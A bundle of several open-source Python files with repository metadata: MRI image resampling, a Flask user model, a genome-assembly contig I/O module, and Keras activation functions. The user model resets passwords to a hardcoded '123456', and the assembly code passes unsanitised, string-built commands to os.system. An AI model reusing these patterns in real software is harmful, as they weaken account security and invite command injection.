resampled = scipy.interpolate.interpn([np.arange(dim) for dim in self.shape],
self,
image_coords,
method=method,
bounds_error=False,
fill_value=0).squeeze()
transform = _transforms.transformation_matrix(row_vector,
col_vector,
space_coords[0, 0, 0],
voxel_size)
# we have to transpose the result to go from x, y, z to row, col, slice
return ImageBase(resampled.T, transform=transform)
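# Illustrative sketch (not part of the original module): a hypothetical volume
# with 2 mm isotropic voxels and no rotation could be built and queried like
# this (numpy_data is any 3d array):
#   img = ImageBase(numpy_data, transform=np.diag([2.0, 2.0, 2.0, 1.0]))
#   img.voxel_size                 # -> array([2., 2., 2.])
#   img.to_scanner(1.0, 2.0, 3.0)  # voxel indices -> scanner-space mm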
|
{
"content_hash": "55464e142b0b8cc7f2466427fc42f684",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 109,
"avg_line_length": 33.54609929078014,
"alnum_prop": 0.5531712473572938,
"repo_name": "openmrslab/suspect",
"id": "0449cb28db81c4eeea66f88953fe0706c834a3fd",
"size": "9460",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "suspect/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "194195"
}
],
"symlink_target": ""
}
|
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from app import login_manager, db
class User(UserMixin, db.Model):
"""
    User account information.
"""
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), index=True, unique=True, nullable=True)
real_name = db.Column(db.String(32), index=True)
password_hash = db.Column(db.String(128), nullable=True)
power = db.Column(db.Integer, nullable=True)
created_date = db.Column(db.DateTime())
created_people = db.Column(db.String(32))
comment = db.Column(db.String(32))
@property
def password(self):
        raise AttributeError('incorrect username or password')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def reset_password(self):
"""
        Reset the password; the initial password is 123456.
:return: None
"""
self.password = '123456'
def verify_password(self, password):
"""
        Compare the given password with the stored password hash.
        :param password: the password to check
:return: True or False
"""
return check_password_hash(self.password_hash, password)
def __repr__(self):
return "<User '{}' >".format(self.username)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
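# Illustrative sketch (not part of the original module; values are made up):
#   u = User(username='alice')
#   u.password = 's3cret'         # only the hash is stored
#   u.verify_password('s3cret')   # -> True
#   u.password                    # raises AttributeError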
|
{
"content_hash": "e399787d962a9b4d0f738c54298c3b40",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 79,
"avg_line_length": 28.285714285714285,
"alnum_prop": 0.6406926406926406,
"repo_name": "lvhuiyang/cxcy-ims",
"id": "fbf937b064475a053e460feaee244dd5842a114a",
"size": "1482",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models/user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3394"
},
{
"name": "HTML",
"bytes": "89877"
},
{
"name": "JavaScript",
"bytes": "1609"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "74812"
}
],
"symlink_target": ""
}
|
import os
import houseKeeper
import graphLib
import alignerRobot
from operator import itemgetter
from itertools import groupby
# ## 0) Preprocess by removing embedded contigs (I: contigs.fasta ; O : noEmbed.fasta)
def obtainLength(folderName, fileName):
f = open(folderName + fileName, 'r')
tmp = f.readline().rstrip()
lenDic = {}
tmplen = 0
tmpName = ""
while len(tmp) > 0:
if tmp[0] == '>':
if tmplen != 0:
lenDic[tmpName] = tmplen
tmplen = 0
tmpName = tmp[1:]
else:
tmplen += len(tmp)
tmp = f.readline().rstrip()
lenDic[tmpName] = tmplen
f.close()
return lenDic
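# Illustrative sketch (not part of the original file): for a FASTA file
# containing
#   >ContigA
#   ACGT
#   ACG
#   >ContigB
#   ACGTACGT
# obtainLength returns {'ContigA': 7, 'ContigB': 8}.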
def findContigLength(folderName, option):
if option == "contigs":
print "\n\nfindContigLength(folderName)\n"
contigLength = {}
f = open(folderName + "smaller_contigs_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
else:
print "\n\nfindContigLength(folderName)\n"
contigLength = {}
f = open(folderName + "improved_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
f = open(folderName + "relatedReads_Double.fasta", 'r')
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
while len(tmp1) > 0 and len(tmp2) > 0:
contigLength[tmp1[1:]] = len(tmp2)
tmp1 = f.readline().rstrip()
if len(tmp1) > 0:
tmp2 = f.readline().rstrip()
f.close()
return contigLength
def putListToFileO(folderName, sourceFileName, targetFileName, myList):
f = open(folderName + targetFileName + ".txt", 'w')
for eachitem in myList:
f.write(eachitem + '\n')
f.close()
command = "perl -ne 'if(/^>(\S+)/){$c=$i{$1}}$c?print:chomp;$i{$_}=1 if @ARGV' " + folderName + targetFileName + ".txt " + folderName + sourceFileName + " > " + folderName + targetFileName + ".fasta"
os.system(command)
def writeToFile_Double1(folderName, fileName1, fileName2, option="contig"):
f2 = open(folderName + fileName2, 'w')
fOriginal = open(folderName + fileName1, 'r')
readSet = []
tmp = fOriginal.readline().rstrip()
tmpRead = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpRead) > 0:
readSet.append(tmpRead)
tmpRead = ""
else:
tmpRead = tmpRead + tmp
tmp = fOriginal.readline().rstrip()
readSet.append(tmpRead)
print "len(readSet)", len(readSet)
fOriginal.close()
if option == "contig":
header = ">Contig"
else:
header = ">Read"
for eachcontig, dum in zip(readSet, range(len(readSet))):
f2.write(header + str(dum) + "_p\n")
f2.write(eachcontig + '\n')
f2.write(header + str(dum) + "_d\n")
f2.write(houseKeeper.reverseComplement(eachcontig) + '\n')
f2.close()
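# Illustrative sketch (not part of the original file): each input record is
# written twice, once forward and once reverse-complemented (assuming
# houseKeeper.reverseComplement is the standard reverse complement), e.g. an
# input contig AACG becomes
#   >Contig0_p
#   AACG
#   >Contig0_d
#   CGTT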
def loadContigsFromFile(folderName, fileName):
f = open(folderName + fileName, 'r')
tmp = f.readline().rstrip()
dataDic = {}
tmpSeq = ""
tmpName = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpSeq) != 0:
dataDic[tmpName] = tmpSeq
tmpSeq = ""
tmpName = tmp[1:]
else:
tmpSeq += tmp
tmp = f.readline().rstrip()
dataDic[tmpName] = tmpSeq
f.close()
return dataDic
def writeToFile(f2, runningIndex, seq):
f2.write(">Seg_" + str(runningIndex))
f2.write('\n')
f2.write(seq)
f2.write('\n')
# ## 5) Read the contigs out (I: startList, graphNodes ; O: improved.fasta, openZone.txt)
def useAlignToGetLen(eachnode, i, nameDic, orientation, myContigsDic, readNum, folderName, mummerLink):
indexToAddNext = eachnode.nodeIndexList[i+1]
readNumNext = indexToAddNext / 2
orientationNext = indexToAddNext % 2
if len(nameDic) > 0:
orientationNext = nameDic[indexToAddNext]%2
readNumNext = nameDic[indexToAddNext]/2
if orientation == 0:
leftSeg= myContigsDic['Contig' + str(readNum) + '_' + 'p']
else:
leftSeg = myContigsDic['Contig' + str(readNum) + '_' + 'd']
if orientationNext == 0 :
rightSeg = myContigsDic['Contig' + str(readNumNext) + '_' + 'p']
else:
rightSeg = myContigsDic['Contig' + str(readNumNext) + '_' + 'd']
    overlapInfo = align(leftSeg, rightSeg, folderName, mummerLink)
overlapLen = overlapInfo[0]
return overlapLen
def readContigOut(folderName, mummerLink, graphFileName, contigFile, outContigFile, outOpenList, nameDic={}):
print "readContigOut"
G = graphLib.seqGraph(0)
G.loadFromFile(folderName, graphFileName)
G.findStartEndList()
myContigsDic = loadContigsFromFile(folderName, contigFile)
contigUsed = [False for i in range(len(G.graphNodesList) / 2)]
seqToPrint = []
openList = []
noForRevMismatch = True
print len(G.graphNodesList)
for eachnode in G.graphNodesList:
print eachnode.nodeIndexList
if len(eachnode.nodeIndexList) > 0:
tmpSeq = ""
# ## debug consistency of t/f
ckList = []
for dummy in eachnode.nodeIndexList:
indexToAdd = dummy
readNum = indexToAdd / 2
ckList.append(contigUsed[readNum])
if (len(ckList) > 0 and not all(ckList) and any(ckList)):
noForRevMismatch = False
# ## end debug
if contigUsed[eachnode.nodeIndexList[0]/2] == False:
contigUsed[eachnode.nodeIndexList[0]/2] = True
contigUsed[eachnode.nodeIndexList[-1]/2] = True
for i in range(len(eachnode.nodeIndexList)):
indexToAdd = eachnode.nodeIndexList[i]
readNum = indexToAdd / 2
orientation = indexToAdd % 2
#print nameDic[indexToAdd]
if len(nameDic) > 0:
orientation = nameDic[indexToAdd]%2
readNum = nameDic[indexToAdd]/2
#print readNum
if i != len(eachnode.nodeIndexList) - 1:
overlapLenOld = eachnode.overlapList[i]
                        # Recompute the overlap length by re-aligning the two
                        # contigs instead of trusting the stored value
                        overlapLen = useAlignToGetLen(eachnode, i, nameDic, orientation, myContigsDic, readNum, folderName, mummerLink)
                        # End of overlap recomputation
print overlapLen, overlapLenOld
if orientation == 0:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'p'][0:-overlapLen]
else:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'd'][0:-overlapLen]
else:
if orientation == 0:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'p']
else:
tmpSeq = tmpSeq + myContigsDic['Contig' + str(readNum) + '_' + 'd']
if len(tmpSeq) > 0:
if eachnode.nodeIndex in G.myStartList:
openList.append('Segkk' + str(len(seqToPrint)) + ',noprev')
if eachnode.nodeIndex in G.myEndList:
openList.append('Segkk' + str(len(seqToPrint)) + ',nonext')
seqToPrint.append(tmpSeq)
print "No forward/reverse mismatch ?", noForRevMismatch
fImproved = open(folderName + outContigFile, 'w')
for eachcontig, dummyIndex in zip(seqToPrint, range(len(seqToPrint))):
print len(eachcontig)
fImproved.write(">Segkk" + str(dummyIndex) + '\n')
fImproved.write(eachcontig + '\n')
fImproved.close()
print "All contigs used? ", all(contigUsed)
print "NContig", len(seqToPrint)
f = open(folderName + outOpenList, 'w')
f.write(str(len(seqToPrint)) + '\n')
for eachitem in openList:
f.write(str(eachitem) + str('\n'))
f.close()
def obtainLinkInfo(folderName, mummerLink, inputFile, mummerFile):
thres = 5
minLen = 400
# thres = 10
# minLen = 200
writeToFile_Double1(folderName, inputFile + ".fasta", inputFile + "_Double.fasta", "contig")
fmyFile = open(folderName + inputFile + "_Double.fasta", 'r')
fSmaller = open(folderName + inputFile + "_contigs_Double.fasta", 'w')
tmp = fmyFile.readline().rstrip()
maxSize = 50000
myName = ""
while len(tmp) > 0:
if tmp[0] == '>':
fSmaller.write(tmp + '\n')
myName = tmp[1:]
else:
component = tmp[0:min(len(tmp), maxSize)]
countComp = len(component)
fSmaller.write(component)
component = tmp[max(0, len(tmp) - maxSize):len(tmp)]
fSmaller.write(component)
countComp = countComp + len(component)
print "DebugName", myName, countComp
fSmaller.write('\n')
tmp = fmyFile.readline().rstrip()
fSmaller.close()
fmyFile.close()
if True:
alignerRobot.useMummerAlignBatch(mummerLink, folderName, [[mummerFile, inputFile + "_contigs_Double.fasta", inputFile + "_contigs_Double.fasta", ""]], houseKeeper.globalParallel )
# alignerRobot.useMummerAlign(mummerLink, folderName, mummerFile, inputFile + "_contigs_Double.fasta", inputFile + "_contigs_Double.fasta")
lengthDic = obtainLength(folderName, inputFile + "_contigs_Double.fasta")
dataSetRaw = alignerRobot.extractMumData(folderName, mummerFile + "Out")
# ## Format [ helperStart, helperEnd , readStart, readEnd,matchLen1,matchLen2,percentMatch,helperName,readName]
dataSet = []
for eachitem in dataSetRaw:
helperStart, helperEnd , readStart, readEnd, matchLen1, matchLen2, percentMatch, helperName, readName = eachitem
detailHelper = helperName.split('_')
detailRead = readName.split('_')
if detailHelper[0] != detailRead[0] and helperName != readName and max(matchLen1, matchLen2) > minLen and readStart < readEnd and min(helperStart, readStart) < thres and min(lengthDic[helperName] - helperEnd, lengthDic[readName] - readEnd) + 1 < thres:
conditionForMatch = True
else:
conditionForMatch = False
if conditionForMatch :
if helperStart < thres:
dataSet.append((max(matchLen1, matchLen2), readName, helperName))
dataSet.sort(reverse=True)
numberOfContig = len(lengthDic)
return numberOfContig, dataSet
def truncateEndOfContigs(folderName, filenameIn, filenameOut, maxSize, lengthDic):
'''
fmyFile = open(folderName + "improved_Double.fasta", 'r')
fSmaller = open(folderName + "smaller_improvedContig.fasta", 'w')
maxSize = 25000
truncateEndOfContigs(folderName, "improved_Double.fasta", "smaller_improvedContig.fasta", 25000, lengthDic)
'''
fmyFile = open(folderName + filenameIn, 'r')
fSmaller = open(folderName + filenameOut, 'w')
tmp = fmyFile.readline().rstrip()
myName = ""
while len(tmp) > 0:
if tmp[0] == '>':
fSmaller.write(tmp + '\n')
myName = tmp[1:]
else:
component = tmp[0:min(len(tmp), maxSize)]
countComp = len(component)
fSmaller.write(component)
component = tmp[max(0, len(tmp) - maxSize):len(tmp)]
fSmaller.write(component)
countComp = countComp + len(component)
lengthDic[myName] = countComp
print "DebugName", myName, countComp
fSmaller.write('\n')
tmp = fmyFile.readline().rstrip()
fSmaller.close()
fmyFile.close()
def obtainLinkInfoReadContig(dummyI, mummerLink, folderName, thres, lengthDic, K):
dataSet = []
indexOfMum = ""
if dummyI < 10:
indexOfMum = "0" + str(dummyI)
else:
indexOfMum = str(dummyI)
'''
command = mummerLink + "nucmer --maxmatch --simplify -p " + folderName + "outRefine " + folderName + "smaller_improvedContig.fasta " + "relatedReads_Double.part-" + indexOfMum + ".fasta"
os.system(command)
command = mummerLink + "show-coords -r " + folderName + "outRefine.delta > " + folderName + "fromMumRefine" + indexOfMum
os.system(command)
'''
f = open(folderName + "fromMumRefine" + indexOfMum, 'r')
for i in range(6):
tmp = f.readline()
while len(tmp) > 0:
info = tmp.split('|')
filterArr = info[1].split()
rdGpArr = info[-1].split('\t')
firstArr = info[0].split()
matchLenArr = info[2].split()
matchLen = int(matchLenArr[1])
contigStart, contigEnd = int(firstArr[0]), int(firstArr[1])
readStart, readEnd = int(filterArr[0]) , int(filterArr[1])
contigName = rdGpArr[0].rstrip().lstrip()
readName = rdGpArr[1].rstrip().lstrip()
if readStart < readEnd and matchLen > K and min(contigStart, readStart) < thres and min(lengthDic[contigName] - contigEnd , lengthDic[readName] - readEnd) + 1 < thres:
conditionForMatch = True
else:
conditionForMatch = False
if conditionForMatch :
if contigStart < thres:
dataSet.append((readName, contigName, 'L', matchLen))
if lengthDic[contigName] - contigEnd + 1 < thres :
dataSet.append((readName, contigName, 'R', matchLen))
tmp = f.readline()
f.close()
return dataSet
### Read contigs out from overlap information
def writeSegOut(ctgList, folderName, fileout):
f = open(folderName + fileout, 'w')
for i in range(len(ctgList)):
f.write(">Segkk" + str(i) +'\n')
f.write(ctgList[i])
f.write("\n")
f.close()
def checkIncluded(tmp, markedList):
isIncluded = False
for i in tmp:
if markedList[i/2] == True:
isIncluded = True
return isIncluded
def align(leftSeg, rightSeg, folderName, mummerLink):
overlap = [0, 0 ]
lLen = 0
f = open(folderName + "leftSeg.fasta", 'w')
f.write(">SegL\n")
if len(leftSeg) < 50000:
f.write(leftSeg)
lLen = len(leftSeg)
else:
f.write(leftSeg[-50000:])
lLen = 50000
f.close()
rLen = 0
f = open(folderName + "rightSeg.fasta", 'w')
f.write(">SegR\n")
if len(rightSeg) < 50000:
f.write(rightSeg)
rLen = len(rightSeg)
else:
f.write(rightSeg[0:50000])
rLen = 50000
f.close()
alignerRobot.useMummerAlign(mummerLink, folderName, "overlap", "leftSeg.fasta", "rightSeg.fasta", False)
dataList = alignerRobot.extractMumData(folderName , "overlapOut")
thres = 10
if len(dataList) == 0:
overlap = [0, 0 ]
else:
myMax = [0, 0]
for eachitem in dataList:
if eachitem[1] > lLen - thres and eachitem[2] < thres:
if eachitem[5] > myMax[1]:
myMax[0] = eachitem[4]
myMax[1] = eachitem[5]
overlap = myMax
return overlap
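# Illustrative sketch (not part of the original file): if, say, the last
# ~1200 bp of leftSeg match the first ~1200 bp of rightSeg, align returns
# roughly [1200, 1200] (the match lengths on the left and right segments);
# [0, 0] means no dovetail overlap was found.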
def joinSeg(tmp, folderName, segLookUp, mummerLink):
ctg = segLookUp[tmp[0]]
tmpList = []
for i in range(len(tmp)-1):
overlapArr = align(segLookUp[tmp[i]], segLookUp[tmp[i+1]], folderName, mummerLink)
overlap = overlapArr[1]
print "overlap : ", overlap
if overlap >= 0 :
ctg = ctg + segLookUp[tmp[i+1]][overlap:]
else:
tmpList.append(ctg)
ctg = segLookUp[tmp[i+1]]
tmpList.append(ctg)
return tmpList
def readContigsFromFile(folderName, filename):
segLookUp = []
f = open(folderName + filename, 'r')
tmp = f.readline().rstrip()
tmpStr = ""
while len(tmp) > 0:
if tmp[0] == '>':
if len(tmpStr) > 0:
segLookUp.append(tmpStr)
tmpStr = ""
else:
tmpStr = tmpStr + tmp
tmp = f.readline().rstrip()
if len(tmpStr) > 0:
segLookUp.append(tmpStr)
tmpStr = ""
f.close()
return segLookUp
def extractGraphToContigs(G, folderName, mummerLink, fileout, filein):
N1 = len(G.graphNodesList)
markedList = [False for i in range(N1/2)]
segLookUp = readContigsFromFile(folderName, filein)
ctgList = []
for eachnode in G.graphNodesList:
if len(eachnode.nodeIndexList) > 0:
tmp = eachnode.nodeIndexList
isIncluded = checkIncluded(tmp, markedList)
for eachitem in tmp:
markedList[eachitem/2] = True
if not isIncluded :
ctgtmpList = joinSeg(tmp, folderName, segLookUp, mummerLink)
ctgList = ctgList + ctgtmpList
writeSegOut(ctgList, folderName, fileout)
def fillInMissed(folderName, mummerLink, filerefname, filequeryname, fileoutname):
os.system("mv " + folderName + fileoutname + " " + folderName + filequeryname )
alignerRobot.useMummerAlignBatch(mummerLink, folderName, [[fileoutname+"fillmiss", filerefname, filequeryname, ""]], houseKeeper.globalParallel)
dataList = alignerRobot.extractMumData(folderName, fileoutname+"fillmissOut")
lenDic = obtainLength(folderName, filerefname)
    ### Check whether any reference contigs are missing from the query
    # Format of the dataList: 1 765 | 11596 10822 | 765 775 | 84.25 | ref_NC_001133_ scf7180000000702
dataList.sort(key = itemgetter(-2))
thres = 100
extraList = []
for key, items in groupby(dataList, itemgetter(-2)):
isFound = False
for eachitem in items:
if abs(int(eachitem[4]) - lenDic[key]) < thres:
isFound = True
break
if not isFound:
extraList.append(key)
### Fill in any missing items
referenceDic = loadContigsFromFile(folderName, filerefname)
queryDic = loadContigsFromFile(folderName, filequeryname)
ctgList = [referenceDic[eachitem] for eachitem in extraList] + [queryDic[eachitem] for eachitem in queryDic]
writeSegOut(ctgList, folderName, fileoutname)
print "fileoutname: len(extraList)",fileoutname, len(extraList), len(ctgList)
|
{
"content_hash": "fc80a76770ed6421401cf030fa4920a1",
"timestamp": "",
"source": "github",
"line_count": 642,
"max_line_length": 262,
"avg_line_length": 31.25545171339564,
"alnum_prop": 0.5466460679756803,
"repo_name": "kakitone/finishingTool",
"id": "60e7939edaea8239114483ee2d60f81011429318",
"size": "20066",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "IORobot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "856"
},
{
"name": "Batchfile",
"bytes": "679"
},
{
"name": "C",
"bytes": "301473"
},
{
"name": "C++",
"bytes": "539991"
},
{
"name": "Gnuplot",
"bytes": "1186"
},
{
"name": "HTML",
"bytes": "267964"
},
{
"name": "Makefile",
"bytes": "13218"
},
{
"name": "Objective-C",
"bytes": "15879"
},
{
"name": "Perl",
"bytes": "349282"
},
{
"name": "Python",
"bytes": "422489"
},
{
"name": "Shell",
"bytes": "6666"
},
{
"name": "TeX",
"bytes": "14704"
}
],
"symlink_target": ""
}
|
"""Built-in activation functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import keras_export
# b/123041942
# In TF 2.x, if the `tf.nn.softmax` is used as an activation function in Keras
# layers, it gets serialized as 'softmax_v2' instead of 'softmax' as the
# internal method name is returned in serialization. This results in errors in
# model exporting and loading as Keras can't find any activation function with
# the name of `softmax_v2`.
# This dict maps the activation function name from its v2 version to its
# canonical name.
_TF_ACTIVATIONS_V2 = {
'softmax_v2': 'softmax',
}
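# Illustrative sketch (not part of the original file; behavior assumed from
# the mapping above):
#   serialize(nn.softmax)   # -> 'softmax' (rather than 'softmax_v2')
#   deserialize('softmax')  # -> the softmax function defined below
# so activations round-trip through serialization by their canonical names.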
@keras_export('keras.activations.softmax')
@dispatch.add_dispatch_support
def softmax(x, axis=-1):
"""Softmax converts a real vector to a vector of categorical probabilities.
The elements of the output vector are in range (0, 1) and sum to 1.
Each vector is handled independently. The `axis` argument sets which axis
of the input the function is applied along.
Softmax is often used as the activation for the last
layer of a classification network because the result could be interpreted as
a probability distribution.
The softmax of each vector x is computed as
`exp(x) / tf.reduce_sum(exp(x))`.
  The input values are the log-odds of the resulting probabilities.
Arguments:
x : Input tensor.
axis: Integer, axis along which the softmax normalization is applied.
Returns:
Tensor, output of softmax transformation (all values are non-negative
and sum to 1).
Raises:
ValueError: In case `dim(x) == 1`.
"""
ndim = K.ndim(x)
if ndim == 2:
return nn.softmax(x)
elif ndim > 2:
e = math_ops.exp(x - math_ops.reduce_max(x, axis=axis, keepdims=True))
s = math_ops.reduce_sum(e, axis=axis, keepdims=True)
return e / s
else:
raise ValueError('Cannot apply softmax to a tensor that is 1D. '
'Received input: %s' % (x,))
@keras_export('keras.activations.elu')
@dispatch.add_dispatch_support
def elu(x, alpha=1.0):
"""Exponential Linear Unit.
The exponential linear unit (ELU) with `alpha > 0` is:
`x` if `x > 0` and
`alpha * (exp(x) - 1)` if `x < 0`
The ELU hyperparameter `alpha` controls the value to which an
ELU saturates for negative net inputs. ELUs diminish the
vanishing gradient effect.
ELUs have negative values which pushes the mean of the activations
closer to zero.
Mean activations that are closer to zero enable faster learning as they
bring the gradient closer to the natural gradient.
ELUs saturate to a negative value when the argument gets smaller.
Saturation means a small derivative which decreases the variation
and the information that is propagated to the next layer.
Example Usage:
>>> import tensorflow as tf
>>> model = tf.keras.Sequential()
>>> model.add(tf.keras.layers.Conv2D(32, (3, 3), activation='elu',
... input_shape=(28, 28, 1)))
>>> model.add(tf.keras.layers.MaxPooling2D((2, 2)))
>>> model.add(tf.keras.layers.Conv2D(64, (3, 3), activation='elu'))
>>> model.add(tf.keras.layers.MaxPooling2D((2, 2)))
>>> model.add(tf.keras.layers.Conv2D(64, (3, 3), activation='elu'))
<tensorflow.python.keras.engine.sequential.Sequential object ...>
Arguments:
x: Input tensor.
alpha: A scalar, slope of negative section. `alpha` controls the value to
which an ELU saturates for negative net inputs.
Returns:
The exponential linear unit (ELU) activation function: `x` if `x > 0` and
`alpha * (exp(x) - 1)` if `x < 0`.
Reference:
[Fast and Accurate Deep Network Learning by Exponential Linear Units
(ELUs) (Clevert et al, 2016)](https://arxiv.org/abs/1511.07289)
"""
return K.elu(x, alpha)
@keras_export('keras.activations.selu')
@dispatch.add_dispatch_support
def selu(x):
"""Scaled Exponential Linear Unit (SELU).
The Scaled Exponential Linear Unit (SELU) activation function is defined as:
- `if x > 0: return scale * x`
- `if x < 0: return scale * alpha * (exp(x) - 1)`
where `alpha` and `scale` are pre-defined constants
(`alpha=1.67326324` and `scale=1.05070098`).
Basically, the SELU activation function multiplies `scale` (> 1) with the
output of the `tf.keras.activations.elu` function to ensure a slope larger
than one for positive inputs.
The values of `alpha` and `scale` are
chosen so that the mean and variance of the inputs are preserved
between two consecutive layers as long as the weights are initialized
correctly (see `tf.keras.initializers.LecunNormal` initializer)
and the number of input units is "large enough"
(see reference paper for more information).
Example Usage:
>>> num_classes = 10 # 10-class problem
>>> model = tf.keras.Sequential()
>>> model.add(tf.keras.layers.Dense(64, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(32, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(16, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(num_classes, activation='softmax'))
Arguments:
x: A tensor or variable to compute the activation function for.
Returns:
The scaled exponential unit activation: `scale * elu(x, alpha)`.
Notes:
- To be used together with the
`tf.keras.initializers.LecunNormal` initializer.
- To be used together with the dropout variant
`tf.keras.layers.AlphaDropout` (not regular dropout).
References:
- [Klambauer et al., 2017](https://arxiv.org/abs/1706.02515)
"""
return nn.selu(x)
@keras_export('keras.activations.softplus')
@dispatch.add_dispatch_support
def softplus(x):
"""Softplus activation function, `softplus(x) = log(exp(x) + 1)`.
Example Usage:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.softplus(a)
>>> b.numpy()
array([2.0611537e-09, 3.1326166e-01, 6.9314718e-01, 1.3132616e+00,
2.0000000e+01], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The softplus activation: `log(exp(x) + 1)`.
"""
return nn.softplus(x)
@keras_export('keras.activations.softsign')
@dispatch.add_dispatch_support
def softsign(x):
"""Softsign activation function, `softsign(x) = x / (abs(x) + 1)`.
Example Usage:
>>> a = tf.constant([-1.0, 0.0, 1.0], dtype = tf.float32)
>>> b = tf.keras.activations.softsign(a)
>>> b.numpy()
array([-0.5, 0. , 0.5], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The softsign activation: `x / (abs(x) + 1)`.
"""
return nn.softsign(x)
@keras_export('keras.activations.swish')
@dispatch.add_dispatch_support
def swish(x):
"""Swish activation function, `swish(x) = x * sigmoid(x)`.
Swish activation function which returns `x*sigmoid(x)`.
It is a smooth, non-monotonic function that consistently matches
or outperforms ReLU on deep networks, it is unbounded above and
bounded below.
Example Usage:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.swish(a)
>>> b.numpy()
array([-4.1223075e-08, -2.6894143e-01, 0.0000000e+00, 7.3105860e-01,
2.0000000e+01], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The swish activation applied to `x` (see reference paper for details).
Reference:
- [Ramachandran et al., 2017](https://arxiv.org/abs/1710.05941)
"""
return nn.swish(x)
@keras_export('keras.activations.relu')
@dispatch.add_dispatch_support
def relu(x, alpha=0., max_value=None, threshold=0):
"""Applies the rectified linear unit activation function.
With default values, this returns the standard ReLU activation:
`max(x, 0)`, the element-wise maximum of 0 and the input tensor.
Modifying default parameters allows you to use non-zero thresholds,
change the max value of the activation,
and to use a non-zero multiple of the input for values below the threshold.
For example:
>>> foo = tf.constant([-10, -5, 0.0, 5, 10], dtype = tf.float32)
>>> tf.keras.activations.relu(foo).numpy()
array([ 0., 0., 0., 5., 10.], dtype=float32)
>>> tf.keras.activations.relu(foo, alpha=0.5).numpy()
array([-5. , -2.5, 0. , 5. , 10. ], dtype=float32)
>>> tf.keras.activations.relu(foo, max_value=5).numpy()
array([0., 0., 0., 5., 5.], dtype=float32)
>>> tf.keras.activations.relu(foo, threshold=5).numpy()
array([-0., -0., 0., 0., 10.], dtype=float32)
Arguments:
x: Input `tensor` or `variable`.
alpha: A `float` that governs the slope for values lower than the
threshold.
max_value: A `float` that sets the saturation threshold (the largest value
the function will return).
threshold: A `float` giving the threshold value of the activation function
below which values will be damped or set to zero.
Returns:
A `Tensor` representing the input tensor,
transformed by the relu activation function.
Tensor will be of the same shape and dtype of input `x`.
"""
return K.relu(x, alpha=alpha, max_value=max_value, threshold=threshold)
@keras_export('keras.activations.gelu', v1=[])
@dispatch.add_dispatch_support
def gelu(x, approximate=False):
"""Applies the Gaussian error linear unit (GELU) activation function.
Gaussian error linear unit (GELU) computes
`x * P(X <= x)`, where `P(X) ~ N(0, 1)`.
The (GELU) nonlinearity weights inputs by their value, rather than gates
inputs by their sign as in ReLU.
For example:
>>> x = tf.constant([-3.0, -1.0, 0.0, 1.0, 3.0], dtype=tf.float32)
>>> y = tf.keras.activations.gelu(x)
>>> y.numpy()
array([-0.00404951, -0.15865529, 0. , 0.8413447 , 2.9959507 ],
dtype=float32)
>>> y = tf.keras.activations.gelu(x, approximate=True)
>>> y.numpy()
array([-0.00363752, -0.15880796, 0. , 0.841192 , 2.9963627 ],
dtype=float32)
Arguments:
x: Input tensor.
approximate: A `bool`, whether to enable approximation.
Returns:
The gaussian error linear activation:
`0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))`
if `approximate` is `True` or
`x * P(X <= x) = 0.5 * x * (1 + erf(x / sqrt(2)))`,
where `P(X) ~ N(0, 1)`,
if `approximate` is `False`.
Reference:
- [Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415)
"""
return nn.gelu(x, approximate)
@keras_export('keras.activations.tanh')
@dispatch.add_dispatch_support
def tanh(x):
"""Hyperbolic tangent activation function.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.tanh(a)
>>> b.numpy()
array([-0.9950547, -0.7615942, 0., 0.7615942, 0.9950547], dtype=float32)
Arguments:
